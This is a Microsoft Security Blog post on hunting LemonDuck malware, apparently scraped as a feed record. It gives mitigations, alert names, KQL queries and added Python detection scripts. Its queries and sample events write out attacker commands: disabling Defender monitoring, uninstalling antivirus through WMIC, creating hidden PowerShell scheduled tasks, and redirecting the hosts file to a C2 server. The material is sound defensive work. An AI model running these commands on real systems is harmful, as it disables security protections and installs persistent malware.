Below we list mitigation actions, detection information, and advanced hunting queries that Microsoft 365 Defender customers can use to harden networks against threats from LemonDuck and other malware operations.\n\n### Mitigations\n\nApply these mitigations to reduce the impact of LemonDuck. Check the recommendations card for the deployment status of monitored mitigations.\n\n * Prevent threats from arriving via removable storage devices by blocking these devices on sensitive endpoints. If you allow removable storage devices, you can minimize the risk by turning off autorun, enabling real-time antivirus protection, and blocking untrusted content. [Learn about stopping threats from USB devices and other removable media](<https://docs.microsoft.com/windows/security/threat-protection/device-control/control-usb-devices-using-intune>).\n * Ensure that Linux and Windows devices are included in routine patching, and validate protection against the CVE-2019-0708, CVE-2017-0144, CVE-2017-8464, CVE-2020-0796, CVE-2021-26855, CVE-2021-26858, and CVE-2021-27065 vulnerabilities, as well as against brute-force attacks in popular services like SMB, SSH, RDP, SQL, and others.\n * [Turn on PUA protection](<https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/detect-block-potentially-unwanted-apps-windows-defender-antivirus>). Potentially unwanted applications (PUA) can negatively impact machine performance and employee productivity. 
In enterprise environments, PUA protection can stop adware, torrent downloaders, and coin miners.\n * Turn on [tamper protection features](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-antivirus/prevent-changes-to-security-settings-with-tamper-protection>)to prevent attackers from stopping security services.\n * Turn on [cloud-delivered protection](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-antivirus/enable-cloud-protection-microsoft-defender-antivirus>)and automatic sample submission on Microsoft Defender Antivirus. These capabilities use artificial intelligence and machine learning to quickly identify and stop new and unknown threats.\n * Encourage users to use Microsoft Edge and other web browsers that support SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that contain exploits and host malware. [Turn on network protection](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/enable-network-protection>)to block connections to malicious domains and IP addresses.\n * Check your [Office 365 antispam policy](<https://docs.microsoft.com/microsoft-365/security/office-365-security/configure-your-spam-filter-policies>)and your [mail flow rules](<https://docs.microsoft.com/microsoft-365/security/office-365-security/create-safe-sender-lists-in-office-365#recommended-use-mail-flow-rules>) for allowed senders, domains and IP addresses. [Apply extra caution](<https://docs.microsoft.com/exchange/troubleshoot/antispam/cautions-against-bypassing-spam-filters>) when using these settings to bypass antispam filters, even if the allowed sender addresses are associated with trusted organizations\u2014Office 365 will honor these settings and can let potentially harmful messages pass through. 
[Review system overrides in threat explorer](<https://docs.microsoft.com/microsoft-365/security/office-365-security/threat-explorer#system-overrides>) to determine why attack messages have reached recipient mailboxes.\n\n### Attack surface reduction\n\nTurn on the following attack surface reduction rules, to block or audit activity associated with this threat:\n\n * [Block executable content from email client and webmail](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-executable-content-from-email-client-and-webmail>)\n * [Block JavaScript or VBScript from launching downloaded executable content](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-javascript-or-vbscript-from-launching-downloaded-executable-content>)\n * [Block Office applications from creating executable content](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-office-applications-from-creating-executable-content>)\n * [Block all office applications from creating child processes](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-all-office-applications-from-creating-child-processes>)\n * [Block executable files from running unless they meet a prevalence, age, or trusted list criterion](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-executable-files-from-running-unless-they-meet-a-prevalence-age-or-trusted-list-criterion>)\n * [Block execution of potentially obfuscated scripts](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-execution-of-potentially-obfuscated-scripts>)\n * [Block persistence through WMI event 
subscription](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-persistence-through-wmi-event-subscription>)\n * [Block process creations originating from PSExec and WMI commands](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-process-creations-originating-from-psexec-and-wmi-commands>)\n\n### Antivirus detections\n\nMicrosoft Defender Antivirus detects threat components as the following malware:\n\n * TrojanDownloader:PowerShell/LemonDuck!MSR\n * TrojanDownloader:Linux/LemonDuck.G!MSR\n * Trojan:Win32/LemonDuck.A\n * Trojan:PowerShell/LemonDuck.A\n * Trojan:PowerShell/LemonDuck.B\n * Trojan:PowerShell/LemonDuck.C\n * Trojan:PowerShell/LemonDuck.D\n * Trojan:PowerShell/LemonDuck.E\n * Trojan:PowerShell/LemonDuck.F\n * Trojan:PowerShell/LemonDuck.G\n * TrojanDownloader:PowerShell/LodPey.A\n * TrojanDownloader:PowerShell/LodPey.B\n * Trojan:PowerShell/Amynex.A\n * Trojan:Win32/Amynex.A\n\n### Endpoint detection and response (EDR) alerts\n\nAlerts with the following titles in the security center can indicate threat activity on your network:\n\n * LemonDuck botnet C2 domain activity\n * LemonDuck malware\n\nThe following alerts might also indicate threat activity associated with this threat. 
These alerts, however, can be triggered by unrelated threat activity and are not monitored in the status cards provided with this report.\n\n * Suspicious PowerShell command line\n * Suspicious remote activity\n * Suspicious service registration\n * Suspicious Security Software Discovery\n * Suspicious System Network Configuration Discovery\n * Suspicious sequence of exploration activities\n * Suspicious Process Discovery\n * Suspicious System Owner/User Discovery\n * Suspicious System Network Connections Discovery\n * Suspicious Task Scheduler activity\n * Suspicious Microsoft Defender Antivirus exclusion\n * Suspicious behavior by cmd.exe was observed\n * Suspicious remote PowerShell execution\n * Suspicious behavior by svchost.exe was observed\n * A WMI event filter was bound to a suspicious event consumer\n * Attempt to hide use of dual-purpose tool\n * System executable renamed and launched\n * Microsoft Defender Antivirus protection turned off\n * Anomaly detected in ASEP registry\n * A script with suspicious content was observed\n * An obfuscated command line sequence was identified\n * A process was injected with potentially malicious code\n * A malicious PowerShell Cmdlet was invoked on the machine\n * Suspected credential theft activity\n * Outbound connection to non-standard port\n * Sensitive credential memory read\n\n### Advanced hunting\n\nThe LemonDuck botnet is highly varied in its payloads and delivery methods after email distribution, so it can sometimes evade alerts. You can use the advanced hunting capability in Microsoft 365 Defender and Microsoft Defender for Endpoint to surface activities associated with this threat.\n\n**NOTE:** The following sample queries let you search for a week's worth of events. 
To explore up to 30 days worth of raw data to inspect events in your network and locate potential Lemon Duck-related indicators for more than a week, go to the **Advanced Hunting** page > **Query** tab, select the calendar drop-down menu to update your query to hunt for the **Last 30 days**.\n\n**LemonDuck template subject lines**\n\nLooks for subject lines that are present from 2020 to 2021 in dropped scripts that attach malicious LemonDuck samples to emails and mail it to contacts of the mailboxes on impacted machines. Additionally, checks if Attachments are present in the mailbox. General attachment types to check for at present are .DOC, .ZIP or .JS, though this could be subject to change as well as the subjects themselves. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAG2RQUvDQBCF31nwP-ytCnroUUElxEoEUUirxWOiXRuNicSkpeCP99vJepESZnYz8-a9mdmZPlWoUq2ZNlqpUa9vHepAP3Laak2sw5zmGlTqnfsLGEdNgz_SRAtDOc4OTM-fUyuPT_WgJ93qWqea6gzsCfY_6mBKqdiYypcpVHRVRxVPzmmpjLqRIVOiO_Qy4gk8gW1ONtezzo0_x-7JOcvleiQfasNkE7gWuolcS_otbKI-zuHRH_QR82-ot3olXmpHfox6asJetlhtndbcer6wrxFTcmvhWdmmvG35rz7srGLTLvodyAF82FyHWmC5Ane89y0SUyroc837ja-WGkNjk1zqAj_VLyyp2szeAQAA&runQuery=true&timeRangeId=week>)\n\n`EmailEvents \n| where Subject in ('The Truth of COVID-19','COVID-19 nCov Special info WHO','HALTH ADVISORY:CORONA VIRUS', \n'WTF','What the fcuk','good bye','farewell letter','broken file','This is your order?') \n| where AttachmentCount >= 1`\n\n**LemonDuck Botnet Registration Functions**\n\nLooks for instances of function runs with name \u201cSIEX\u201d, which within the Lemon Duck initializing scripts is used to assign a specific user-agent for reporting back to command-and-control infrastructure with. This query should be accompanied by additional surrounding logs showing successful downloads from component sites. 
[Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAG2PuwrCQBRETy34D4ufIViID7ATYmFhE9yAAV9oMIgm3-7ZLQRBhvtgmJm7O6fiQc3euXCrONNwZ8iAN4GWg9zNCkxVNWovajY8uWZ2IgIj1vJt1hbZcxQzuZModUQ1_1OjqL_Jpb6le0qIviRd6O3pxoud_Tc1MePcC1b-YZv3zvoA7T5fgtwAAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceEvents \n| where ActionType == \"PowerShellCommand\" \n| where AdditionalFields =~ \"{\\\"Command\\\":\\\"SIEX\\\"}\"`\n\n**LemonDuck keyword identification**\n\nLooks for simple usage of known LemonDuck keyword variations initiated by PowerShell processes. All results should reflect Lemon_Duck behavior; however, there are existing variants of Lemon_Duck that might not use this term explicitly, so validate with additional hunting queries based on known TTPs. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAJ2NQQrCMBBF_1rwDqErBfEGrqyCUKQ3kKLFBpsojdoKHt7nbESX8pnM8P7MT65ad3nt6aU6nW1KaAWvFXVlHmukp5x6NbCOctrgeVyvyt6o40_CGtoyb9kIdrNATpkubPWWlCyxRXP6QGV__rZkDqjCO6iwnfdlA0naGX9oQn4BD2xHaK4bCSfo7Mv58Klezaq6iiQBAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName == \"powershell.exe\" \n| where InitiatingProcessCommandLine has_any(\"Lemon_Duck\",\"LemonDuck\")`\n\n**LemonDuck Microsoft Defender tampering**\n\nLooks for a command line event where LemonDuck or other like malware might attempt to modify Defender by disabling real-time monitoring functionality or adding entire drive letters to the exclusion criteria. The exclusion additions will often succeed even if tamper protection is enabled due to the design of the application. Custom alerts could be created in an environment for particular drive letters common in the environment. 
[Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAKWRzQqCQBSFzzroHcRVgT1EpIugIKp9mFoappL9LXr4vhkNrJUQl5m53jPnnOsdX4nuyhRxrnRRabOaCKgnKnQldzTUQC_Oh1KqF5ajOWgGnim0e6Hjj8aM_EyEYLEW9o5hplRq7dhzwtFIrjYgV020VGVVEh1ap8LqufK46cpHpYa5h5lozTIqxv9MvsSx6aqE2_T0YU7pIe7hEOjJd64bPpnV-_4rV-PORCqLncAiXJ1eE_D-mJ7h-p1Xm4OZ2radQI1aSFbpDTwRAUzcAQAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessCommandLine has_all (\"Set-MpPreference\", \"DisableRealtimeMonitoring\", \"Add-MpPreference\", \"ExclusionProcess\") \n| project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Antivirus uninstallation attempts**\n\nLooks for a command line event where LemonDuck or other similar malware attempts to uninstall competing security products through _WMIC.exe_: a `product where name like ... call uninstall /nointeractive` invocation that names a vendor such as Kaspersky, Avast, ESET or Norton, or that uses the generic terms \u201cSecurity\u201d and \u201cAntiVirus\u201d. Hits that name products not deployed in the environment are a strong signal and can be used to isolate the device. 
[Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEALWQzUrEQBCE6yz4DiEnF0SfwIP4A6IsguBVQja4wyaTMBN_FsRn97M2u6LeBBl6plPdVV2dczV6VlDNe6uk3lnmXIA3ihrJ97WnNxV60RIsEYWuqAWqQZXvqMcfCpegLfmcjs6cE71zl-h0nnkE-kqUf5xwRt5xKmoL3bjnk7kEyXrgbjkH6A_mLfQEd_w2p9QhEXceW1RWO7yeNAqY0foZ_gbbdByD9a6MVqw8IfjvlZr922ZRa292bWSwdrbz9eSswkNlv1_fw5Rn-mp2SvaxZTTGt_2n3inonkj05gmf4y1R6akXuvulNNMH1HgRaFYCAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName =~ \"wmic.exe\" \n| where InitiatingProcessCommandLine has_all(\"product where\",\"name like\",\"call uninstall\",\"/nointeractive\") \n| where InitiatingProcessCommandLine has_any(\"Kaspersky\",\"avast\",\"avp\",\"security\",\"eset\",\"AntiVirus\",\"Norton Security\")`\n\n**Known LemonDuck component script installations**\n\nLooks for instances of the callback actions which attempt to obfuscate detection while downloading supporting scripts such as those that enable the \u201cKiller\u201d and \u201cInfection\u201d functions for the malware as well as the mining components and potential secondary functions. Options for more specific instances included to account for environments with potential false positives. Most general versions are intended to account for minor script or component changes such as changing to utilize non .bin files, and non-common components. 
[Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAN2QzWrCUBCFz1roO1xctSC60p2rVlEQ8Q0kJrYJJlGS-Ac-vN8dA9rgwm3LMHcm58zPmXxprYMShcSFCm0tK7ER-Fq5KvI3tXSR01ExWIE7TeES2ESBvbl-GhPGoCn5nIrMenyV07va2lF3tFmlzUyxLvGEt9XBQ3qiB-zjqYpXdHySZ1gAF2lmNb43Bim15PXbvaoePQ4uhNuSVcw513oiU5xTvwdNNaxxr7LfqEmJAV-RaQpq9qZjR3_Fjoltj-0yB1Pw-gv__j2e62pluu7X_Z_bNsy83-eRRN8NJNPg1z-4At8RQUloAwAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName in (\"powershell.exe\",\"cmd.exe\") \n| where InitiatingProcessCommandLine has_all(\"/c echo try\",\"down_url=\",\"md5\",\"downloaddata\",\"ComputeHash\") or \nInitiatingProcessCommandLine has_all(\"/c echo try\",\"down_url=\",\"md5\",\"downloaddata\",\"ComputeHash\",\".bin\") or \nInitiatingProcessCommandLine has_all(\"/c echo try\",\"down_url=\",\"md5\",\"downloaddata\",\"ComputeHash\",\"kr.bin\",\"if.bin\",\"m6.bin\")`\n\n**LemonDuck named scheduled task creation**\n\nLooks for instances where LemonDuck creates its statically named scheduled tasks, or for the semi-unique task creation pattern LemonDuck also uses: a hidden PowerShell process launched from a task with a randomly generated name. An example of a randomly generated one is: \"schtasks.exe\" /create /ru system /sc MINUTE /mo 60 /tn fs5yDs9ArkV\\2IVLzNXfZV /F /tr \"powershell -w hidden -c PS_CMD\". 
[Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAKWS0WrCQBBF77PgPyx5UrD6BX3S-mRLwQ8o2ygoGpXdtGlB_PaenSQlFV-kLLO53Jmde3eyM631qa1yvq8KOhqKrCf4tQ4qwX31dJZTpQ1cIJzmnNqDXuRVGPOoC3tGfU5dCR-1I8Zkv4jsZp-_qlNwwfIor7RA42BVG-s2oMeE2nTSo5B6Dv_d9c3476Z7CXZ6526e8zuQB-_Jja7yH-bAX2WCTcybM4duYE8O73WUNG_dt9YKqNc44jxarvjNpj_Q4gKlrsMWzztsaPCJ2spmGG2WyYPTA1xytsXpyt5E4nKb8hKvUz1rZvf9AWK9PVhOAgAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where FileName =~ \"schtasks.exe\" \n| where ProcessCommandLine has(\"/create\") \n| where ProcessCommandLine has_any(\"/tn blackball\",\"/tn blutea\",\"/tn rtsa\") or \nProcessCommandLine has_all(\"/create\",\"/ru\",\"system\",\"/sc\",\"/mo\",\"/tn\",\"/F\",\"/tr\",\"powershell -w hidden -c PS_CMD\")`\n\n**Competition killer script scheduled task execution**\n\nLooks for instances of the LemonDuck component KR.Bin, which is intended to kill competition prior to making the installation and persistence of the malware concrete. The killer script used is based off historical versions from 2018 and earlier, which has grown over time to include scheduled task and service names of various botnets, malware, and other competing services. The version currently in use by LemonDuck has approximately 40-60 scheduled task names. The upper maximum in this query can be modified and adjusted to include time bounding. 
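The scheduled-task, Defender-tampering, antivirus-uninstallation and competition-killer queries in this section restated as offline detection logic, as an added example that is not code from the Microsoft post or from LemonDuck, so the rules can be exercised without a Microsoft 365 Defender tenant. It runs over constructed DeviceProcessEvents-style records with made-up device IDs and command lines; the task names, command fragments and the 40 to 80 deletion bound are the ones the queries above use. Two deliberate differences from the KQL are labelled in comments: `has` is approximated with whole-token matching, and the random-task rule matches any hidden PowerShell command rather than the literal `PS_CMD` placeholder.

```python
"""Offline re-implementation of several LemonDuck hunting rules (added example)."""
import re
from collections import defaultdict

STATIC_TASK_NAMES = ("blackball", "blutea", "rtsa")   # task names named in the post
AV_TERMS = ("Kaspersky", "avast", "avp", "security", "eset", "AntiVirus", "Norton Security")
KILLER_TERMS = ("Mysa", "Sorry", "Oracle Java Update", "ok")
KILLER_MIN, KILLER_MAX = 40, 80                       # bounds used by the killer query

# Generalises the post's example task: random folder\name, forced, hidden PowerShell.
# Differs from the KQL, which looks for the literal placeholder "PS_CMD".
RANDOM_HIDDEN_TASK_RE = re.compile(
    r'/tn\s+[A-Za-z0-9]{6,}\\[A-Za-z0-9]{6,}\s*/F\s+/tr\s+"?powershell\s+-w\s+hidden', re.IGNORECASE)
DRIVE_EXCLUSION_RE = re.compile(r"ExclusionPath\s+([A-Za-z]:\\)", re.IGNORECASE)


def _has(text, term):
    """Approximates KQL `has`: the term must appear as whole token(s), case-insensitively."""
    pattern = r"(?<![a-z0-9])" + re.escape(term.lower()) + r"(?![a-z0-9])"
    return re.search(pattern, text.lower()) is not None


def has_all(text, *terms):
    return all(_has(text, t) for t in terms)


def has_any(text, *terms):
    return any(_has(text, t) for t in terms)


def rule_defender_tamper(ev):
    cl = ev.get("InitiatingProcessCommandLine", "")
    if has_all(cl, "Set-MpPreference", "DisableRealtimeMonitoring", "Add-MpPreference", "ExclusionProcess"):
        return "defender_tamper", f"excluded drives: {DRIVE_EXCLUSION_RE.findall(cl)}"
    return None


def rule_av_uninstall(ev):
    cl = ev.get("InitiatingProcessCommandLine", "")
    if (ev.get("InitiatingProcessFileName", "").lower() == "wmic.exe"
            and has_all(cl, "product where", "name like", "call uninstall", "/nointeractive")
            and has_any(cl, *AV_TERMS)):
        return "av_uninstall", cl
    return None


def rule_schtasks_create(ev):
    cl = ev.get("ProcessCommandLine", "")
    if ev.get("FileName", "").lower() != "schtasks.exe" or not _has(cl, "/create"):
        return None
    if has_any(cl, *(f"/tn {name}" for name in STATIC_TASK_NAMES)):
        return "schtasks_static_name", cl
    if RANDOM_HIDDEN_TASK_RE.search(cl):
        return "schtasks_random_hidden_ps", cl
    return None


def hunt(events):
    """Return findings as (device, rule, evidence) tuples over a list of event dicts."""
    findings = []
    deletes = defaultdict(set)
    for ev in events:
        for rule in (rule_defender_tamper, rule_av_uninstall, rule_schtasks_create):
            hit = rule(ev)
            if hit:
                findings.append((ev["DeviceId"], *hit))
        cl = ev.get("ProcessCommandLine", "")
        if has_all(cl, "schtasks.exe", "/Delete", "/TN", "/F"):
            deletes[ev["DeviceId"]].add(cl)
    # Competition killer: a burst of forced task deletions that names known competitor tasks.
    for device, cmds in deletes.items():
        volume = len(cmds)
        if KILLER_MIN <= volume <= KILLER_MAX and any(has_any(c, *KILLER_TERMS) for c in cmds):
            findings.append((device, "competition_killer", f"{volume} distinct /Delete commands"))
    return findings


def rules_by_device(findings):
    out = defaultdict(set)
    for device, rule, _ in findings:
        out[device].add(rule)
    return {d: sorted(r) for d, r in out.items()}


def _event(device, file_name, cmd, parent_name="", parent_cmd=""):
    return {"DeviceId": device, "FileName": file_name, "ProcessCommandLine": cmd,
            "InitiatingProcessFileName": parent_name, "InitiatingProcessCommandLine": parent_cmd}


# Constructed sample events (not real telemetry): dev-1 shows the tamper/uninstall/task
# patterns, dev-2 the killer burst, dev-3 benign scheduler use.
SAMPLE_EVENTS = [
    _event("dev-1", "conhost.exe", "conhost.exe 0x4", "powershell.exe",
           'powershell.exe -w hidden -c "Set-MpPreference -DisableRealtimeMonitoring 1 '
           '-ExclusionPath c:\\ ; Add-MpPreference -ExclusionProcess powershell.exe"'),
    _event("dev-1", "WmiPrvSE.exe", "WmiPrvSE.exe -Embedding", "wmic.exe",
           "wmic.exe product where \"name like '%Kaspersky%'\" call uninstall /nointeractive"),
    _event("dev-1", "schtasks.exe",
           'schtasks.exe /create /ru system /sc MINUTE /mo 60 /tn blackball /F /tr "powershell -w hidden -c x"'),
    _event("dev-1", "schtasks.exe",
           'schtasks.exe /create /ru system /sc MINUTE /mo 60 /tn fs5yDs9ArkV\\2IVLzNXfZV /F /tr "powershell -w hidden -c PS_CMD"'),
    _event("dev-3", "schtasks.exe", 'schtasks.exe /create /tn "\\Backup\\Nightly" /sc daily /tr backup.exe'),
    _event("dev-3", "schtasks.exe", 'schtasks.exe /Delete /TN "ok" /F'),  # one deletion: below the bound
] + [
    _event("dev-2", "schtasks.exe", f'schtasks.exe /Delete /TN "{name}" /F')
    for name in list(KILLER_TERMS) + [f"Competitor{i:02d}" for i in range(38)]
]

if __name__ == "__main__":
    for device, rule, evidence in hunt(SAMPLE_EVENTS):
        print(f"{device}: {rule} ({evidence})")
```

The per-device aggregation over `/Delete` commands is the part worth keeping: one deletion is noise, a burst of forty or more naming competitor tasks is the Killer script. In production, bound that aggregation by a time window as the post suggests, not by device alone, and feed the rules from exported telemetry rather than the constructed records here.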
[Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAJWRT0_CQBDF35nE79D0BAkRDhw4oBeqCQbUxD_XBguxhlpMW8EaP7y_HQppiATMZmZnZt_MvLwNNNdKb4q475VpaVHOuaI-V6qC-EwN_cjTWjG1DPP20EPid86UjpnGTEwNFVPJFeITTlM-WUS1sPoCOwf3hflqYx0FxAlW1GqPut3F1_jWjlGuz2pvxs5v2-myBVHIq5vTPIlri84XlfigpskIxHaX41mYJrMKteX5zMTEmLj9F5jjk-FLWCTW8woyhsuGU3gip7-U_8-E-g-ksHE_MOHOyTeKPtDnuJZVfme8I2Pt6YZ4hXl60gdzp7V_WaKyf4DjYXUuTZ-euqbSMS0Hhu6D_gUG3Q8GqgIAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where ProcessCommandLine has_all(\"schtasks.exe\",\"/Delete\",\"/TN\",\"/F\") \n| summarize make_set(ProcessCommandLine) by DeviceId \n| extend DeleteVolume = array_length(set_ProcessCommandLine) \n| where set_ProcessCommandLine has_any(\"Mysa\",\"Sorry\",\"Oracle Java Update\",\"ok\") \n| where DeleteVolume >= 40 and DeleteVolume <= 80`\n\n**LemonDuck hosts file adjustment for dynamic C2 downloads**\n\nLooks for a PowerShell event wherein LemonDuck attempts to simultaneously retrieve the IP address of a C2 and modify the hosts file with the retrieved address. The address is then attributed to a name that does not exist and is randomly generated. The script then instructs the machine to download data from the address. This query has a more general and a more specific version, allowing the detection of this technique if other activity groups were to utilize it. 
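A complementary check on the hosts file itself, as an added example that is not part of the Microsoft post or LemonDuck's code. The process-event query in this section catches the PowerShell that rewrites the hosts file; this script inspects the artifact it leaves behind: an external address mapped to a hostname that looks generated rather than registered, which is the pairing the post describes. The sample hosts text, its addresses and its names are constructed for the example (documentation-range addresses, made-up labels), and the label length and entropy thresholds are assumptions to tune against real hosts files in your environment.

```python
"""Audit a Windows hosts file for external addresses paired with generated-looking names."""
import ipaddress
import math
from collections import Counter

# Assumptions: a first label this long, mixing letters and digits, with this
# much entropy is treated as generated. Tune against your own hosts files.
MIN_LABEL_LEN = 10
ENTROPY_THRESHOLD = 3.0  # bits per character

# Ranges that legitimately appear in enterprise hosts files: RFC 1918, loopback
# and link-local only. The documentation ranges in the sample count as external.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8",
    "169.254.0.0/16", "::1/128", "fc00::/7", "fe80::/10")]


def shannon_entropy(s):
    """Bits per character of the string's character distribution."""
    n = len(s)
    if n == 0:
        return 0.0
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def parse_hosts(text):
    """Yield (ip, hostname) pairs, skipping comments, blanks and unparsable lines."""
    for raw in text.splitlines():
        parts = raw.split("#", 1)[0].split()
        if len(parts) < 2:
            continue
        try:
            ip = ipaddress.ip_address(parts[0])
        except ValueError:
            continue
        for name in parts[1:]:
            yield ip, name.lower()


def is_external(ip):
    """True for a routable address outside the internal ranges above."""
    if isinstance(ip, str):
        ip = ipaddress.ip_address(ip)
    if ip.is_multicast or ip.is_unspecified:
        return False
    return not any(ip in net for net in INTERNAL_NETS)


def looks_generated(hostname):
    """True when the first label is long, mixes letters and digits, and has high entropy."""
    label = hostname.split(".")[0]
    if len(label) < MIN_LABEL_LEN:
        return False
    has_alpha = any(ch.isalpha() for ch in label)
    has_digit = any(ch.isdigit() for ch in label)
    return has_alpha and has_digit and shannon_entropy(label) >= ENTROPY_THRESHOLD


def audit_hosts(text):
    """Return (ip, name, reasons) for every entry; reasons is empty for unremarkable ones."""
    results = []
    for ip, name in parse_hosts(text):
        reasons = []
        if is_external(ip):
            reasons.append("external_address")
        if looks_generated(name):
            reasons.append("generated_looking_name")
        results.append((str(ip), name, reasons))
    return results


def suspicious_entries(text):
    """Entries that are both external and generated-looking: the pairing the post describes."""
    return [(ip, name) for ip, name, reasons in audit_hosts(text)
            if "external_address" in reasons and "generated_looking_name" in reasons]


# Constructed sample hosts file (documentation-range addresses, made-up names).
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
10.20.30.40     intranet.corp.example      # internal service on a private address
203.0.113.7     autodiscover.example.org   # external, but a registered-looking name
203.0.113.55    q9vz2kx7hd8f.com           # external address, random label
198.51.100.9    xk4p9zlqm2v7               # external address, single random label
"""

if __name__ == "__main__":
    for ip, name in suspicious_entries(SAMPLE_HOSTS):
        print(f"review: {ip} -> {name}")
```

Run it against `C:\Windows\System32\drivers\etc\hosts` collected from endpoints, and keep the previous day's copy: the post notes the entry is refreshed every 24 hours, so a hosts file whose external entries change daily is itself a signal even before the name heuristic fires. Any external address in an enterprise hosts file deserves a look; the entropy check only ranks them.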
[Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAMWQuwrCYAyFzyz4DqWTgvgGDmK9gYigu5S22IK20op18OH9Erro4OAiIZc_OTknbaRMdxVKyDvVqrxqsDn9TKVu1H319FSgVjm9Gg-0ZlYwLRR7LHX6YFjQPVNvQVx8Z4IFCnUF1TpT44xnbEx-4OGPajPqCxYzS7VxjG3mdBodiaYygH9J_6YV-IY8BZ26irFYDDXCDZN0dd5hbTaE0y6s2PnHXWv432cHNvZs1J3-9_vtHfn_L9Gt0E952_Wxf90Lt1_r6hICAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName == \"powershell.exe\" \n| where InitiatingProcessCommandLine has_all(\"GetHostAddresses\",\"etc\",\"hosts\") \nor InitiatingProcessCommandLine has_all(\"GetHostAddresses\",\"IPAddressToString\",\"etc\",\"hosts\",\"DownloadData\")`\n\n \n\n[Learn how your organization can stop attacks through automated, cross-domain security and built-in AI with Microsoft Defender 365](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>).\n\n \n\nThe post [When coin miners evolve, Part 2: Hunting down LemonDuck and LemonCat attacks](<https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-29T19:00:59", "type": "mmpc", "title": "When coin miners evolve, Part 2: Hunting down LemonDuck and LemonCat attacks", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": 
{"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0144", "CVE-2017-8464", "CVE-2019-0708", "CVE-2020-0796", "CVE-2021-26855", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-07-29T19:00:59", "id": "MMPC:4A6B394DCAF12E05136AE087248E228C", "href": "https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-30T00:39:50", "description": "_[Note: In this two-part blog series, we expose a modern malware infrastructure and provide guidance for protecting against the wide range of threats it enables. Part 1 covers the evolution of the threat, how it spreads, and how it impacts organizations. [Part 2](<https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/>) is a deep dive on the attacker behavior and will provide investigation guidance.] _\n\nCombating and preventing today's threats to enterprises require comprehensive protection focused on addressing the full scope and impact of attacks. Anything that can gain access to machines\u2014even so-called commodity malware\u2014can bring in more dangerous threats. We\u2019ve seen this in banking Trojans serving as entry point for ransomware and hands-on-keyboard attacks. LemonDuck, an 